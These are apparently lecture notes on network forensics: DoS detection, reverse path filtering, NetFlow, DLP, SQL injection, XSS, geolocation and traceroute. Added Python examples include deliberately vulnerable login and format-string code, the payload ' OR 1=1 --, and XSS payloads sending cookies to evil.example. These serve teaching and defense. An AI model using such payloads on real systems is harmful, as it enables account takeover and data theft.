11/8 forensic notes

Overview of Denial of Service (DoS) Attacks

  • A Distributed Denial of Service (DDoS) attack is launched from many compromised hosts, but the flood still enters the Internet through specific providers, where it can be identified and filtered.

  • Investigators contact the Internet Service Providers (ISPs) carrying the attack traffic and ask them to trace it back toward its source and stop it there.

Network Telescope System

  • A monitoring tool for detecting denial of service attacks: it records everything that arrives at a block of routable but unused IP addresses, where no legitimate traffic should ever appear.

  • Detects anomalies such as backscatter, the scattered reply traffic that a flooding attack generates.

    • Attackers spoof random source IP addresses on their flood packets. The victim answers each one (for example with a SYN-ACK or RST), and those replies go to the spoofed addresses; the ones that fall inside the telescope's unused range are the backscatter packets.

  • A burst of backscatter from one address shows that the address is being flooded, so monitoring for it reveals attacks and abnormal traffic even when the victim has not reported anything.
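
Added example (not from the notes): detection logic over constructed packets arriving at a hypothetical telescope block, 203.0.113.0/24. Replies (SYN-ACK, RST) into the block are backscatter and identify a flood victim; unsolicited SYNs into the block identify a scanner.

```python
# Added example, not part of the notes: classify traffic that reaches a
# network telescope and infer which hosts are being flooded.
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the telescope owns this unused (dark) block. No legitimate
# traffic should ever be addressed to it.
TELESCOPE = ip_network("203.0.113.0/24")

# TCP flags a victim sends in reply to spoofed packets: a SYN flood produces
# SYN-ACKs, probes to closed ports produce RSTs.
BACKSCATTER_FLAGS = {"SA", "R", "RA"}

# Constructed sample packets as (src, dst, tcp_flags). 192.0.2.10 is being
# SYN-flooded and answers spoofed sources that fall in the dark block;
# 198.51.100.5 is a scanner sending its own SYNs into the block.
SAMPLE = [
    ("192.0.2.10", "203.0.113.4", "SA"),
    ("192.0.2.10", "203.0.113.77", "SA"),
    ("192.0.2.10", "203.0.113.130", "SA"),
    ("192.0.2.10", "203.0.113.9", "SA"),
    ("198.51.100.5", "203.0.113.1", "S"),
    ("198.51.100.5", "203.0.113.2", "S"),
    ("192.0.2.33", "203.0.113.50", "R"),
]


def classify(src, dst, flags):
    """Label one packet as 'backscatter', 'scan' or 'ignore'."""
    if ip_address(dst) not in TELESCOPE:
        return "ignore"        # not addressed to the dark block
    if flags in BACKSCATTER_FLAGS:
        return "backscatter"   # a reply: the sender is answering spoofed packets
    return "scan"              # unsolicited SYN: the sender is probing the block


def find_victims(packets, min_replies=3):
    """Count backscatter per sender; senders above the threshold are likely flood victims."""
    replies = Counter()
    for src, dst, flags in packets:
        if classify(src, dst, flags) == "backscatter":
            replies[src] += 1
    return {src: n for src, n in replies.items() if n >= min_replies}


def find_scanners(packets, min_targets=2):
    """Senders whose unsolicited packets touched several dark addresses."""
    targets = defaultdict(set)
    for src, dst, flags in packets:
        if classify(src, dst, flags) == "scan":
            targets[src].add(dst)
    return {src for src, seen in targets.items() if len(seen) >= min_targets}


if __name__ == "__main__":
    print("likely victims:", find_victims(SAMPLE))
    print("scanners:", find_scanners(SAMPLE))
```

The thresholds are arbitrary for the demo; on a real telescope the reply rate from one address, not a raw count, is what distinguishes a flood from a stray reply.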

Strategies for Denial of Service Attack Prevention

1. Reverse Address Verification (reverse path forwarding)

  • Before forwarding a packet, the router looks the source IP address up in its routing table and checks that it is reachable, in strict mode through the very interface the packet arrived on.

    • This filters out packets with spoofed source addresses, but the extra lookup costs forwarding performance, and strict mode drops legitimate traffic when routes are asymmetric.
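
Added example (not from the notes): the reverse path check in both loose and strict mode against a small constructed routing table; interface names and addresses are hypothetical.

```python
# Added example, not part of the notes: reverse path verification (uRPF)
# against a small, constructed routing table.
from ipaddress import ip_address, ip_network

# Assumption: the router's forwarding table as (prefix, egress interface).
# 192.0.2.0/24 is the provider side, 10.0.0.0/8 the site, 10.1.0.0/16 one lab.
ROUTES = [
    (ip_network("192.0.2.0/24"), "wan0"),
    (ip_network("10.0.0.0/8"), "lan0"),
    (ip_network("10.1.0.0/16"), "lan1"),
]


def lookup(addr):
    """Longest-prefix match; returns the egress interface or None if unroutable."""
    best = None
    for net, iface in ROUTES:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None


def rpf_allows(src, ingress, strict=True):
    """Would a packet back to `src` leave through `ingress`?

    Loose mode only requires that the source be routable at all; strict mode
    also requires that the return route use the interface the packet arrived on.
    Strict mode drops legitimate traffic when routing is asymmetric, so it is
    normally enabled only at the customer edge.
    """
    egress = lookup(ip_address(src))
    if egress is None:
        return False           # unroutable / bogon source: drop in both modes
    return (egress == ingress) if strict else True


def filter_packets(packets, strict=True):
    """Return the (src, ingress) pairs the router would forward."""
    return [(src, ingress) for src, ingress in packets if rpf_allows(src, ingress, strict)]


# Constructed packets as (source address, interface it arrived on).
PACKETS = [
    ("10.1.2.3", "lan1"),      # internal host on its own interface
    ("10.1.2.3", "wan0"),      # internal address arriving from the provider: spoofed
    ("10.2.0.1", "lan0"),      # covered by 10.0.0.0/8
    ("192.0.2.77", "wan0"),    # provider address on the provider link
    ("203.0.113.5", "wan0"),   # no route at all
]

if __name__ == "__main__":
    print("strict:", filter_packets(PACKETS, strict=True))
    print("loose: ", filter_packets(PACKETS, strict=False))
```

Note that loose mode accepts the spoofed 10.1.2.3 from wan0, and on a router with a default route it would accept 203.0.113.5 as well; loose mode only catches addresses with no route anywhere.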

2. NetFlow System

  • Developed by Cisco and deployed on routers at network boundaries; instead of full packet captures it exports metadata for each flow (source and destination address, ports, protocol, packet and byte counts).

  • Flow statistics reveal traffic patterns, such as thousands of short flows converging on one destination, so the attacking and targeted addresses can be identified and filtered.
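
Added example (not from the notes): SYN-flood detection over constructed NetFlow-style records. The CSV layout stands in for the binary export; the heuristic flags a destination when most of its flows are single-packet SYNs that never complete.

```python
# Added example, not part of the notes: find SYN-flood targets in NetFlow-style
# records. The record layout and the flow data are constructed for the example;
# real exports (NetFlow v5/v9, IPFIX) carry the same fields in binary.
from collections import defaultdict

# Constructed flow records, one per line:
# src,dst,sport,dport,proto,tcp_flags,packets,bytes
FLOWS = """\
10.0.0.5,192.0.2.10,40001,443,6,S,1,60
10.0.0.6,192.0.2.10,40002,443,6,S,1,60
10.0.0.7,192.0.2.10,40003,443,6,S,1,60
10.0.0.8,192.0.2.10,40004,443,6,S,1,60
10.0.0.9,192.0.2.10,40005,443,6,S,1,60
172.16.4.2,192.0.2.10,51000,443,6,SPA,40,31000
172.16.4.2,192.0.2.20,51001,80,6,SPA,12,9800
172.16.4.3,192.0.2.20,51002,80,6,SPA,9,7100
"""


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, sport, dport, proto, flags, pkts, byts = line.split(",")
        flows.append({"src": src, "dst": dst, "sport": int(sport), "dport": int(dport),
                      "proto": int(proto), "flags": flags,
                      "packets": int(pkts), "bytes": int(byts)})
    return flows


def syn_flood_targets(flows, min_flows=5, min_ratio=0.8):
    """Destinations where most flows are single-packet SYNs that never complete."""
    per_dst = defaultdict(list)
    for f in flows:
        per_dst[f["dst"]].append(f)
    report = {}
    for dst, fl in per_dst.items():
        half_open = [f for f in fl if f["proto"] == 6 and f["flags"] == "S" and f["packets"] == 1]
        if len(fl) >= min_flows and len(half_open) / len(fl) >= min_ratio:
            report[dst] = {
                "flows": len(fl),
                "half_open": len(half_open),
                "sources": sorted({f["src"] for f in half_open}),
            }
    return report


def acl_lines(report, acl_number=101):
    """Cisco IOS extended-ACL lines blocking the attacking sources.

    Only useful when the sources are real; a flood with spoofed sources
    needs rate limiting toward the destination instead.
    """
    lines = []
    for dst, info in report.items():
        for src in info["sources"]:
            lines.append(f"access-list {acl_number} deny tcp host {src} host {dst}")
    return lines


if __name__ == "__main__":
    found = syn_flood_targets(parse_flows(FLOWS))
    print(found)
    print("\n".join(acl_lines(found)))
```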

Vulnerabilities and Exploits

1. distcc Utility

  • A distributed C compiler: a build on one machine sends compilation jobs to idle machines on the network.

    • A distcc server that accepts jobs from any host lets an attacker submit crafted jobs, for example input that triggers a buffer overflow in the build, so that code of the attacker's choosing runs on the server.

2. Format String Vulnerabilities

  • Occur when user input is passed as the format string of a function such as printf instead of as an argument.

    • The function interprets any conversion directives in the input (for example %x or %n), and because it cannot verify that matching arguments were supplied, it reads from the stack or writes to memory, which an attacker uses to leak data or to inject and execute code.
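
Added example (not from the notes): the same bug class in Python's str.format rather than C's printf. Where C's "%x" directives read the stack, a user-controlled template such as "{cfg.db_password}" walks object attributes. The config class, secret and field names are hypothetical.

```python
# Added example, not part of the notes: the same bug class in Python's
# str.format. In C the attacker's "%x" directives read the stack; here
# "{cfg.db_password}" walks object attributes. Names are hypothetical.
import string


class ServiceConfig:
    def __init__(self):
        self.hostname = "app01"
        self.db_password = "hunter2"   # constructed secret for the demo


def greet_unsafe(user_template, cfg):
    """Vulnerable: the user controls the format string itself."""
    return user_template.format(cfg=cfg)


def greet_safe(username, cfg):
    """Hardened: the format string is a constant, user text is only a value."""
    return "Welcome {name} to {host}".format(name=username, host=cfg.hostname)


class StrictFormatter(string.Formatter):
    """Allows user-supplied templates but only whitelisted, plain field names.

    get_field receives the whole field expression ("host.__class__", "0"),
    so attribute walks and positional access are rejected outright.
    """
    ALLOWED = {"host", "user"}

    def get_field(self, field_name, args, kwargs):
        if field_name not in self.ALLOWED:
            raise ValueError(f"field {field_name!r} is not permitted")
        return super().get_field(field_name, args, kwargs)


def render_template(user_template, cfg, username="guest"):
    """For cases where users legitimately supply a template (mail merge, alerts)."""
    return StrictFormatter().format(user_template, host=cfg.hostname, user=username)


def template_rejected(user_template, cfg):
    """True if the strict formatter refuses the template."""
    try:
        render_template(user_template, cfg)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    cfg = ServiceConfig()
    print(greet_unsafe("{cfg.db_password}", cfg))       # leaks the secret
    print(greet_safe("{cfg.db_password}", cfg))         # prints the braces literally
    print(template_rejected("{host.__class__}", cfg))   # True
```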

3. Insider Threats

  • Attackers may also come from inside the organization. Insiders can launch DoS attacks, but internal monitoring makes such attacks easy to detect and attribute, so that is rarely their goal.

  • Insider threats therefore tend to focus on data theft rather than destructive attacks.

Data Loss Prevention (DLP)

  • Tools and policies that keep sensitive information from leaving the organization.

    • A DLP system can scan outbound email and attachments for keyword patterns (account numbers, classification markings) and block or quarantine the message before the data leaves.

  • Attackers evade DLP by fragmenting the data across several messages or by encoding it (for example with Base64) so that the keyword patterns no longer appear in plain text.

Encoding Example: Base64

  • Base64 regroups the bits of the input: every three 8-bit bytes become four 6-bit groups, each printed as one of 64 characters (A-Z, a-z, 0-9, + and /). The plaintext keywords disappear from the encoded output, so a DLP filter that matches only literal strings misses them.
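
Added example (not from the notes): a literal keyword matcher that Base64 defeats, beside one that decodes Base64-looking runs before matching, plus the 8-bit to 6-bit regrouping itself. The keywords and the sample message are constructed.

```python
# Added example, not part of the notes: a keyword DLP check that is blind to
# Base64, beside one that decodes Base64-looking runs before matching.
# Keywords and the sample message are constructed.
import base64
import binascii
import re

KEYWORDS = ["CONFIDENTIAL", "Project Falcon"]

# A run of Base64 alphabet characters long enough to be worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def naive_match(text):
    """Literal keyword match: what a basic DLP rule does."""
    return [k for k in KEYWORDS if k.lower() in text.lower()]


def decode_candidates(text):
    """Decode each Base64-looking run that yields valid UTF-8 text."""
    found = []
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        run += "=" * (-len(run) % 4)          # restore padding if it was trimmed
        try:
            raw = base64.b64decode(run, validate=True)
            found.append(raw.decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue                          # ordinary long word or binary data
    return found


def dlp_match(text):
    """Match on the plain text and on every decoded candidate."""
    hits = set(naive_match(text))
    for decoded in decode_candidates(text):
        hits.update(naive_match(decoded))
    return sorted(hits)


def six_bit_groups(data):
    """The regrouping Base64 performs: 8-bit bytes -> 6-bit groups (zero padded)."""
    bits = "".join(f"{b:08b}" for b in data)
    bits += "0" * (-len(bits) % 6)
    return [bits[i:i + 6] for i in range(0, len(bits), 6)]


# Constructed outbound message with the sensitive text Base64-encoded.
MESSAGE = "Attached: " + base64.b64encode(b"CONFIDENTIAL: Project Falcon budget").decode()

if __name__ == "__main__":
    print("naive:", naive_match(MESSAGE))       # []
    print("decoding:", dlp_match(MESSAGE))      # both keywords
    print(six_bit_groups(b"Man"))               # the four groups behind "TWFu"
```

Decoding every candidate run is cheap for mail, but an attacker can layer encodings (Base64 inside a zip, hex, a custom alphabet), so this catches only the simplest evasion; fragmentation across messages needs session-level correlation that keyword rules cannot provide.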

Types of Attacks

4. Script Injection Attacks

  • Attacker-controlled input containing script is inserted into a web application's pages or queries.

    • Depending on how the application validates input and encodes output, the script may execute on the server or in another user's browser.

SQL Injection

  • Attackers supply specially crafted strings that the application concatenates into an SQL query, changing the query's meaning so that an authentication check passes or data is read without authorization.

  • Example: a password field containing ' OR 1=1 -- turns the WHERE clause of a login query into a condition that is always true, so the check passes without a valid password.

Cross-Site Scripting (XSS)

  • Malicious JavaScript is injected into a web page so that it executes in other users' browsers, with the page's origin and their session.

    • Reflected XSS: the script travels in a crafted URL and the server echoes it into the response. It executes only when a victim opens that link.

    • Stored XSS: the script is saved on the server (for example in a comment or profile field) and executes for every user who views the affected page.

Prevention Strategies

For SQL Injection

  • Escape or reject characters such as the single quote that would change the meaning of the query statement; on its own this is fragile, since a numeric context needs no quote at all.

  • Use parameterized queries (prepared statements) so that input is always bound as data and can never alter the form of the SQL command.
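
Added example (not from the notes) covering both the injection above and the two prevention strategies: the 1=1 login bypass against an in-memory SQLite table, a quote-stripping filter that stops it but not a numeric-context payload, and the parameterized queries that stop both. The table and accounts are constructed.

```python
# Added example, not part of the notes: the login bypass from the notes
# against an in-memory SQLite table, beside a quote-stripping "fix" and the
# parameterized query. Table and accounts are constructed.
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "correct horse"), (2, "bob", "battery staple")])
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Input is concatenated into the SQL text, so quotes and comments rewrite it."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return con.execute(query).fetchone()[0] > 0


def strip_quotes(value):
    """The 'disable specific symbols' strategy: remove the characters that close a literal."""
    return value.replace("'", "").replace('"', "")


def count_by_id_filtered(con, user_id):
    """Quote stripping does nothing for a numeric context: 1 OR 1=1 needs no quote."""
    query = "SELECT COUNT(*) FROM users WHERE id = " + strip_quotes(user_id)
    return con.execute(query).fetchone()[0]


def login_parameterized(con, username, password):
    """The driver binds the values; they can never become part of the statement."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone()[0] > 0


def count_by_id_parameterized(con, user_id):
    return con.execute("SELECT COUNT(*) FROM users WHERE id = ?", (user_id,)).fetchone()[0]


# The password "' OR 1=1 --" turns the WHERE clause into
#   username = 'alice' AND password = '' OR 1=1 --'
# which is true for every row; "--" comments out the trailing quote.
LOGIN_PAYLOAD = "' OR 1=1 --"
ID_PAYLOAD = "1 OR 1=1"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable login with payload:", login_vulnerable(con, "alice", LOGIN_PAYLOAD))
    print("parameterized login with payload:", login_parameterized(con, "alice", LOGIN_PAYLOAD))
    print("rows matched by filtered id lookup:", count_by_id_filtered(con, ID_PAYLOAD))
    print("rows matched by parameterized id lookup:", count_by_id_parameterized(con, ID_PAYLOAD))
```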

For XSS Attacks

  • Validate input strictly and, more importantly, encode output for the context where it is inserted (HTML body, attribute, JavaScript); rejecting the string "<script>" alone does not stop payloads that use an event handler attribute.

  • Re-scan and sanitize stored data regularly, since a stored payload that slipped past validation is served to every visitor until it is removed.
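
Added example (not from the notes) for the XSS section and its prevention strategies: an untrusted comment rendered raw, after a <script> blocklist, and with HTML output encoding. The payloads, the page fragment and the crude "would this execute" check are constructed for the demo.

```python
# Added example, not part of the notes: rendering an untrusted comment
# unescaped, with a <script> blocklist, and with HTML output encoding.
# The payloads and page fragment are constructed.
import html
import re

# What a stored or reflected XSS attack submits. The second payload carries
# no <script> tag at all; the browser runs the onerror handler instead.
PAYLOAD_SCRIPT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
PAYLOAD_EVENT = '<img src=x onerror="fetch(\'http://evil.example/?c=\'+document.cookie)">'

# Crude detector used only to show which renderings still contain markup
# a browser would execute: a script tag, or any tag with an on* handler.
ACTIVE_MARKUP = re.compile(r"(?is)<script|<\w+[^>]*\son\w+\s*=")


def render_unsafe(comment):
    """Interpolates the raw string into the page: classic stored/reflected XSS."""
    return f'<p class="comment">{comment}</p>'


def blocklist_filter(comment):
    """The 'disallow scripting' approach: strip <script>...</script> only."""
    return re.sub(r"(?is)<script.*?>.*?</script>", "", comment)


def render_escaped(comment):
    """Output encoding for the HTML body context: <, >, &, ', " become entities."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def executes(rendered):
    """True if the rendered fragment still carries executable markup."""
    return bool(ACTIVE_MARKUP.search(rendered))


if __name__ == "__main__":
    for label, out in [("raw", render_unsafe(PAYLOAD_EVENT)),
                       ("blocklist", render_unsafe(blocklist_filter(PAYLOAD_EVENT))),
                       ("escaped", render_escaped(PAYLOAD_EVENT))]:
        print(f"{label:10s} executes={executes(out)}  {out}")
```

html.escape is correct only for text placed in the HTML body; a value inserted into an attribute, a URL or a script block needs the encoding for that context.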

Geolocation Awareness in Network Forensics

1. Geolocation Techniques

  • GPS: accurate, but the signal usually does not reach indoors.

  • Dead Reckoning: estimates the current position from the last known position plus the direction and distance travelled since (useful indoors, where GPS is unavailable).

  • IP Addresses and Time Zones: geolocation databases map an IP address to a region, and a device's time zone setting narrows the location further, but both are approximate.

2. Data Consistency in Forensics

  • Timestamps from different sources (device clocks, server logs, network captures) arrive in different formats and time zones and must be converted to one standard, normally UTC, before events can be ordered and correlated.

  • Knowing when and where each event occurred lets the investigator correlate evidence across sources and establish where the data came from.
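
Added example (not from the notes): normalizing constructed evidence from three sources, a web log with a local UTC offset, a firewall log in UTC and a phone backup with a Unix epoch, onto one UTC timeline, and refusing a naive timestamp whose zone is unknown.

```python
# Added example, not part of the notes: bring timestamps from three constructed
# sources (web log with local offset, firewall log in UTC, phone backup with a
# Unix epoch) onto one UTC timeline.
from datetime import datetime, timezone

# (source, timestamp as that source records it, event)
EVENTS = [
    ("webserver", "2023-11-08T09:15:02-05:00", "GET /export.csv by alice"),
    ("firewall", "2023-11-08T14:14:55+00:00", "allow 10.0.0.5 -> 192.0.2.10:443"),
    ("phone", 1699452960, "gps fix 40.71,-74.01"),
    ("webserver", "2023-11-08T09:13:40-05:00", "login alice"),
]


def to_utc(value):
    """Normalise an ISO-8601 string with offset, or a Unix epoch, to aware UTC."""
    if isinstance(value, (int, float)):
        return datetime.fromtimestamp(value, tz=timezone.utc)
    dt = datetime.fromisoformat(value)
    if dt.tzinfo is None:
        # A naive timestamp cannot be placed on the timeline until the source's
        # zone is established from the device or server configuration.
        raise ValueError(f"naive timestamp {value!r}: source time zone unknown")
    return dt.astimezone(timezone.utc)


def timeline(events):
    """Events ordered by their UTC instant, with the original value kept for the report."""
    rows = [(to_utc(ts), src, ts, msg) for src, ts, msg in events]
    rows.sort(key=lambda r: r[0])
    return rows


def needs_zone(value):
    """True when the value is naive or unparseable and must not be used as-is."""
    try:
        to_utc(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for when, src, original, msg in timeline(EVENTS):
        print(f"{when.isoformat()}  {src:9s}  {msg}   (recorded as {original})")
```

Sorted by raw values the web log's 09:13 would appear hours before the firewall's 14:14; in UTC the login, the firewall permit, the export and the phone fix fall within three minutes of each other.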

Network Path Analysis with Trace Route

  • Used to identify the routing path and the network devices between a source and a destination.

    • Sends probes with an increasing TTL; each router that decrements the TTL to zero returns an ICMP Time Exceeded message that reveals its address, until a probe reaches the target or the hop limit is hit.

  • The output lists each hop with its round-trip times; a jump in latency or a run of timeouts (printed as *) locates congestion or a device that drops probes, which is useful for diagnosing network issues.
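
Added example (not from the notes): a parser for traceroute output that extracts each hop's address and round-trip times, then flags silent hops and latency jumps. The output it parses is constructed in the format Linux traceroute prints; it is not a capture from a real path.

```python
# Added example, not part of the notes: parse traceroute output into hops and
# flag where latency jumps or probes time out. The output below is constructed
# in the format Linux traceroute prints.
import re

SAMPLE_OUTPUT = """\
traceroute to 192.0.2.10 (192.0.2.10), 30 hops max, 60 byte packets
 1  gateway (10.0.0.1)  0.412 ms  0.388 ms  0.371 ms
 2  100.64.0.1 (100.64.0.1)  8.120 ms  8.005 ms  7.990 ms
 3  * * *
 4  core1.example.net (198.51.100.1)  21.330 ms  21.102 ms  21.411 ms
 5  192.0.2.10 (192.0.2.10)  95.870 ms  96.010 ms  95.930 ms
"""

HOP_LINE = re.compile(r"^\s*(\d+)\s+(.*)$")
HOST_IP = re.compile(r"(\S+)\s+\(([\d.]+)\)")
RTT = re.compile(r"([\d.]+)\s+ms")


def parse_traceroute(text):
    """Return one dict per hop: ttl, host, ip, rtts (ms) and whether it timed out."""
    hops = []
    for line in text.splitlines():
        m = HOP_LINE.match(line)
        if not m:
            continue                  # header line or blank
        ttl, rest = int(m.group(1)), m.group(2)
        rtts = [float(x) for x in RTT.findall(rest)]
        host = HOST_IP.search(rest)
        hops.append({
            "ttl": ttl,
            "host": host.group(1) if host else None,
            "ip": host.group(2) if host else None,
            "rtts": rtts,
            "timeout": not rtts,      # every probe for this TTL went unanswered
        })
    return hops


def latency_jumps(hops, threshold_ms=50.0):
    """TTLs where the best RTT rises by more than threshold_ms over the previous answering hop."""
    flagged, prev = [], None
    for h in hops:
        if h["timeout"]:
            continue
        best = min(h["rtts"])
        if prev is not None and best - prev > threshold_ms:
            flagged.append(h["ttl"])
        prev = best
    return flagged


def silent_hops(hops):
    """TTLs that never answered: a router that drops or rate-limits ICMP, or a filter."""
    return [h["ttl"] for h in hops if h["timeout"]]


if __name__ == "__main__":
    parsed = parse_traceroute(SAMPLE_OUTPUT)
    for h in parsed:
        print(h)
    print("silent:", silent_hops(parsed), "jumps:", latency_jumps(parsed))
```

Comparing the minimum RTT per hop rather than the mean avoids false jumps from a single slow probe; a silent hop in the middle of an otherwise responsive path is usually a router that rate-limits ICMP, not a broken link, since later hops still answer.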